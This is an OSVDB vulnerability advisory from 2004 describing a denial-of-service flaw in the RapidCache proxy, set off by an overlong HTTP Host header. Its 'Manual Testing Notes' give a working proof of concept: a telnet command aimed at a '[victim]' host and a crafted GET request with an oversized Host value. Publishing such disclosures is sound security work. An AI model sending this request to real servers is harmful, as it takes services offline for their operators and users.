RapidCache Host Header Overflow DoS

2004-01-15T06:09:52
ID OSVDB:3553
Type osvdb
Reporter OSVDB
Modified 2004-01-15T06:09:52

Description

Vulnerability Description

RapidCache contains a flaw that may allow a remote denial of service. The issue is triggered when an overly long "Host:" header is supplied, and will result in loss of availability for the service.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

RapidCache contains a flaw that may allow a remote denial of service. The issue is triggered when an overly long "Host:" header is supplied, and will result in loss of availability for the service.

Manual Testing Notes

telnet [victim] 80

GET / HTTP/1.1 Accept: /..Accept-Language: en-gb Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeBBBBXXX X:8080 Connection: Keep-Alive

References:

Vendor URL: http://www.vicomsoft.com/rapidcache/rapidcache.main.html Secunia Advisory ID:10650 Related OSVDB ID: 3554 Other Advisory URL: http://www.elitehaven.net/rapidcache.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-01/0116.html ISS X-Force ID: 14834 Bugtraq ID: 9427